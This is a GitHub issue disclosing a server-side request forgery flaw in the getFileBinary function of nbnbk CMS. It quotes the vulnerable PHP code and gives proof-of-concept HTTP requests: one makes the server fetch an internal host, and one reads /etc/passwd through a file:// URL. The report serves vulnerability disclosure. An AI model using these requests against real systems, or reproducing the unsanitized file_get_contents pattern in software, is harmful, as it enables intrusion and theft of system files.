Skip to content

[Vuln] SSRF vulnerability in getFileBinary Function #5

Closed
@zer0yu

Description

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * 文件转Base64二进制流
     * @param $url 网络文件路径,绝对地址
     * @return string
     */
    public function getFileBinary()
    {
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
    }

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

image

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

png1

After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd)

image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions